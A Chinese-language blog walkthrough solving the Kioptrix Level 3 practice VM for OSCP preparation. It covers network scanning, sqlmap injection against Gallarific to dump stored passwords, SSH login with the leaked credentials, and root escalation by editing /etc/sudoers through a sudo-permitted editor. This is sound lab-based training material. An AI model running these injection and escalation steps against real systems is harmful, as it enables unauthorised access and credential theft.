OSCP备战-kioptrixvm3详细解法

small_white_robot2025-05-12 14:32

探测IP

复制代码 
arp-scan -l

得出目标IP:192.168.155.165

也可以使用

复制代码 
netdiscover -i eth0 -r 192.168.155.0/24

也可以使用

复制代码 
nmap -sN 192.168.155.0/24 --min-rate 1000

修改hosts文件

找到IP后,通过之前读取README.txt了解到,我们需要编辑hosts文件,将其指向kioptrix3.com

输入命令:

复制代码 
sudo nano /etc/hosts

添加一行如图所示:

复制代码 
192.168.155.165 kioptrix3.com

按下ctrl+x保存退出

端口扫描

复制代码 
nmap -sV -sT --min-rate 1000 -p1-65535 IP

结果:

Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-08 08:49 EDT

Nmap scan report for 192.168.155.165

Host is up (0.0050s latency).

Not shown: 65533 closed tcp ports (conn-refused)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with

80端口

访问一下

拿dirsearch 扫一下看看

复制代码 
dirsearch -u http://192.168.155.165 -e *

访问一下试试:

192.168.155.165/phpmyadmin/index.php

尝试无密码登录:admin

进入后台

no privileges提示我们没有权限,显示即为一个虚拟数据库

尝试爆破了一下,没出结果

回到主页,能点的都点一下

博客给了一个网页http://kioptrix3.com/gallery,和主页点击now跳转网页是一样的

点击login又是一个登录框

最开始我们就改了hosts文件,访问一下http://kioptrix3.com站点

如图:

明显跟之前的页面不一样,在那dirsearch扫一下

复制代码 
dirsearch -u http://kioptrix3.com/gallery -e *

访问得到:

Gallarific 2.1 - Free Version released October 10, 2009

搜一下searchsploit Gallarific

有一个注入漏洞的

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch

数据库:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --dbs

现在连接的数据库:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-db

DBMS用户:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-user

发现是root用户

表:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery --tables

字段:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users --columns

值:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users -C "username,password" --dump

得到登录结果:
admin/n0t7t1k4

如此尝试,发现在dev_accounts中,得到了两组用户名和密码

尝试进行连接,只有后两组密码可以连接

复制代码 
ssh -oHostKeyAlgorithms=+ssh-rs- loneferret@192.168.155.165

查看查看:

复制代码 
cat /etc/passwd

列出当前用户家目录下的所有文件和文件夹:

复制代码 
ls -al

读取文件:

复制代码 
cat CompanyPolicy.README

查看权限:

复制代码 
sudo -l

根据提示执行:

复制代码 
sudo /usr/local/bin/ht

报错

执行命令:

复制代码 
echo $TERM
export TERM=xterm
echo $TERM

重新执行

复制代码 
sudo /usr/local/bin/ht


按住F3,输入/etc/sudoers

回车.当用户执行sudo命令时,系统会到/etc/sudoers文件中寻找相关信息来判断该用户是否具有执行sudo的权限,所以我们修改sudoers文件,试用户loneferret具有使用sudo执行/bin/bash的权限,以达到提权的目的。

修改配置添加一行

复制代码 
loneferret ALL=(ALL) ALL

F2保存,ctral+c退出

执行命令

复制代码 
sudo /bin/bash

成功

相关推荐
大白的编程日记.15 分钟前
【计算网络学习笔记】MySql的多版本控制MVCC和Read View
网络·笔记·学习·mysql
AI绘画小332 小时前
Web 安全核心真相:别太相信任何人!40 个漏洞挖掘实战清单,直接套用!
前端·数据库·测试工具·安全·web安全·网络安全·黑客
shmexon2 小时前
上海兆越亮相无锡新能源盛会,以硬核通信科技赋能“能碳未来”
网络·人工智能
北京耐用通信2 小时前
告别“牵一发而动全身”:耐达讯自动化Profibus PA分线器为石化流量计网络构筑安全屏障
人工智能·网络协议·安全·自动化·信息与通信
Lay_鑫辰3 小时前
西门子诊断-状态和错误位(“轴”工艺对象 V1...3)
服务器·网络·单片机·嵌入式硬件·自动化
galaxylove3 小时前
Gartner发布2025年人工智能和网络安全技术成熟度曲线:网络安全领域对AI的期望值达到顶峰
人工智能·安全·web安全
pandarking3 小时前
[CTF]攻防世界:Lottery
web安全
车载测试工程师3 小时前
CAPL学习-IP API函数-2
网络·学习·tcp/ip·capl·canoe
galaxylove4 小时前
Gartner发布CISO人工智能安全指南:将AI安全治理融入所有网络安全治理体系
人工智能·安全·web安全
小曹要微笑4 小时前
MPU (Memory Protection Unit) 详解(嵌入式系统安全与可靠性的核心守护者)
安全·系统安全
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连04UV安装并设置国内源05Linux下V2Ray安装配置指南06安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)07“我的电脑”图标没了怎么办 4种方法找回08Labelme从安装到标注:零基础完整指南09全球最强模型Grok4,国内已可免费使用!(附教程)10Gemini 3.0 Pro Preview 实测报告